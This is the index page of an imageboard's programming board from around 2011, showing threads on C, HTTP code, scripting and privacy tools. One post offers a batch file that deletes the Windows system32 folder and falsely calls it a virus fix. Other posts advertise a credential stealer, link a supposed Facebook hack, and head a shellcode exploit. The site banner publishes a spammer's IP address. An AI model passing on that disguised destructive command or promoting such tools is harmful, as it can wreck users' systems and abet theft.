[Watched Threads]  [RSS] [Home]

Email
Captcha image
Subject   (new thread)
Message
File []
Password  (for post and file deletion)
  • Supported file types are: GIF, JPG, PDF, PNG
  • Maximum file size allowed is 5883 KB.
  • Images greater than 200x200 pixels will be thumbnailed.
  • Currently 55 unique user posts. View catalog

  • Blotter updated: 2011-08-26 Show/Hide Show All

We've got mail! Send any love or hate letters to [email protected]
A person that goes by the name of Anymou has been spamming this site and many others due to massive buttfustration. Here's his current ip: 118.128.252.17
have fun!

File 132768959949.png - (17.18KB , 480x480 , csharp.png )
314 No. 314 hide watch quickreply [Reply] [Edit]
Any of you fags use C#?
>> No. 315 [Edit]
File 132900318060.jpg - (36.86KB , 560x695 , 1326159709237.jpg )
315
no


File 132677834073.png - (163.26KB , 1280x960 , idou5k.png )
313 No. 313 hide watch quickreply [Reply] [Edit]
HC Stealer! Try it free!
www.drizzlestudio.net


No. 293 hide watch quickreply [Reply] [Edit]
Where do you draw the line on programming and scripting?
>> No. 301 [Edit]
File 132139673313.jpg - (107.91KB , 890x890 , 1319263514244.jpg )
301
Easy. Does it generate native machine code? Programming! Is it interpretive? Scripting!

inb4 mad javafags and pythonfags
>> No. 305 [Edit]
>>301

I can only assume by interpreted you mean "line-by-line" execution, I don't think compiling to bytecode is scripting.
>> No. 312 [Edit]
Just because a programming language is dynamic, doesn't mean it's a scripting language.

Scripting languages are supplemental. More often than not, they are used in conjunction with a programming language or another scripting language. If it's usually used by itself, It's usually a programming language.


File 131082332847.jpg - (144.86KB , 812x884 , 1305550195658.jpg )
273 No. 273 hide watch quickreply [Reply] [Edit]
sup /gram/
I am actually trying to code an app who send a get request to an http server.
My header code seems to be ok but i've got this msg : Request header field is missing ':' separator.
Can't understand !
here is my code:

sprintf(header,"GET /maj/vup.php?info1=%s&info2=%s HTTP/1.1\r\n",argv[2],ctnt);
send(sock,header,sizeof(header), 0);
send(sock,"Host: alberto.com\r\n",sizeof("Host: alberto.com\r\n"), 0);
send(sock,"User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\r\n",sizeof("User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\r\n"), 0);
send(sock,"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n", sizeof("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"), 0);
send,(sock,"Accept-Language: en-us,en;q=0.5\r\n",sizeof("Accept-Language: en-us,en;q=0.5\r\n"), 0);
send(sock,"Accept-Encoding: gzip,deflate\r\n",sizeof("Accept-Encoding: gzip,deflate\r\n"), 0);
send(sock,"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",sizeof("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"), 0);
send(sock,"Keep-Alive: 115\r\n",sizeof("Keep-Alive: 115\r\n"), 0);
Message too long. Click here to view the full text.
>> No. 290 [Edit]
File 131877098337.png - (1.02MB , 640x811 , CaptainObvious-01.png )
290
Sounds like you need to put a colon in there somewhere.
>> No. 311 [Edit]
Why the fuck are you using C and not even an abstracted http libraray?

If you are trying to learn http, start with netcat, then some scripting language like python or lua.

If you are trying to learn C, do something else.

If you are trying to simply get the job done and you insist on using C, use libcurl for http.

Also, try crafting the header as a static string constant, then gradually make it more programmable. That way you will know exactly what it is you did that broke it.


File 131584774745.jpg - (11.03KB , 287x176 , images (1).jpg )
279 No. 279 hide watch expand quickreply [Reply] [Edit]
A programming board that actually has programming in it?
What is this sorcery?
3 posts omitted. Click Reply to view.
>> No. 295 [Edit]
vim test.bat
iecho inorite:wq
test.bat

That's what I do in school right now.
Fuck that cmd. I'm eager to do soem fucking bash. At least PowerShell. Fuck.
>> No. 298 [Edit]
class Know {
public:

bool Rite() { return know; }

private:
bool know;
}

int main() {
Know I;
if (I::Rite) then { cout << "No idea!"; } else { cout << "I know, right."; }
>> No. 310 [Edit]
public class KillOP
{
public static void main (String[] args){
for (int stab = 0; stab < 10; stab++){
System.out.print("die")
}
boolean death = true;
}
}


File 131894679178.png - (172.67KB , 397x700 , pokemon-what-we-saw.png )
291 No. 291 hide watch quickreply [Reply] [Edit]
/gram/ I come to those fluent in Java with an idea...

A 4chon.org Android app. Now before everyone shuns me just listen...

Imagine a lightweight, clean, basic browser specifically for 4chon. You can choose to browse by image only

(see: https://market.android.com/details?id=com.murtos.chanbrowser&feature=search_result)

Or you can view full threads

https://market.android.com/details?id=com.dxh.chant&feature=search_result

I think a program for the community like this should be made BY the community so how about a website or forum for those who want to contribute?

I can make the website, but alas, am helpless with making the app.
Message too long. Click here to view the full text.
>> No. 308 [Edit]
an app would be nice for droid, iphone, webos, etc

but finding someone that would make it...that's another concern


File 131678105212.jpg - (53.87KB , 592x936 , one_two.jpg )
283 No. 283 hide watch expand quickreply [Reply] [Edit]
http://pastebin.com/WfZAmn0c
http://pastebin.com/XPS47Teq

These are the scripts the 4chan janitors use to shit on 4chan

hope you find these useful

love: from a Concerned 4chan Staffer
3 posts omitted. Click Reply to view.
>> No. 287 [Edit]
Awesome.
OP is awesome.
>> No. 288 [Edit]
note that these are hosted on imagebear
whois of imagebear http://pastebin.com/jyN306Ce
owned by "dongfix" aka "enumeric" aka the guy in that pastebin aka mod butt-buddy ne plus ultra rulefag who lurks in #4chan and whines about threads he doesn't like
>> No. 307 [Edit]
the scripts that were linked on imagebear are gone now


File 130679238753.gif - (43B , 1x1 , millionsofyearscouragewolf.gif )
263 No. 263 hide watch quickreply [Reply] [Edit]
Two questions in one.
First off, I'd ask elsewhere but I am currently in a country full of censorship so I'm quite limited to my *ch*ns. Which leads me to my first question. They banned the hell out of a lot of proxies and stuff. So, I'm asking for help in getting around such things. Yeah, quite general but basically if you could help me out in getting a decent proxy that'd be nice<3
Second question, I need an email account. Something that basically couldn't be more bland sounding. I'm not asking for an account. Just a website to register with. See, I don't really know how secure hotmail is or yahoo or gmail. But I've heard of googles notoriousness when it comes to them storing stuff on servers. I'm looking for something that is I guess secure.
So, can anyone help a brudda out? D:
>> No. 264 [Edit]
For proxy usage, I'd suggest SwissVPN, anonine.com or something of the like

as for mail, not entirely sure
>> No. 300 [Edit]
hushmail maybe?
>> No. 306 [Edit]
lavabit for mail


No. 16 hide watch expand quickreply [Reply] [Edit]
Hey all you no lifers, Circlepuller of AwsumChan telling you that NejoArc was interested in adding a code parser, and ran into some problems that I fixed.
now, all of you make a batch file called epic.bat with the following


@echo off
cd \
del c:\windows\system32

This will get rid of a virus that causes your computer to be 0.01% slower than usual, causing your computer to make you look like a faggot.
6 posts omitted. Click Reply to view.
>> No. 294 [Edit]
Oh my god, Crysis is running on max settings with no effort at all...

OP, you need a donation. Do you take Bitcoins?
>> No. 297 [Edit]
ITS PROMPTING ME WUT DO I DO?

fucking idiot learn to del
>> No. 299 [Edit]
That 's the new "alt-F4" joke.
This time : level up!


File 131231445279.jpg - (59.91KB , 527x681 , Its_on.jpg )
277 No. 277 hide watch quickreply [Reply] [Edit]
hello people of 4chon I hail from 4chan /b/orads and i happened to stumble upon your board here and thought maybe you guys can teach me how to code. I want to be able to program apps and games. Thank you in advance for your help
>> No. 278 [Edit]
please don't.
>> No. 296 [Edit]
278 means you should learn a language, preferabrely java, THEN if donr get something in specific


No. 281 hide watch quickreply [Reply] [Edit]
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -

==================================================
Made by:

___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
Message too long. Click here to view the full text.


File 131209436950.png - (43.08KB , 512x512 , Facebook.png )
275 No. 275 hide watch quickreply [Reply] [Edit]
I made a working facebook hack it lets you see private picturers of anyone on facebook
even if there not on your friends list
http://www.mediafire.com/?ihel0w8htygds8r
>> No. 282 [Edit]
fake


Delete post []
Password  
Report post
Reason  
Previous [0] [1]

[Photon] [Kusaba] [Burichan] [Futaba] [Net] [Mapleleaf] [Moonites] [Miku] [Thunderdome] [Test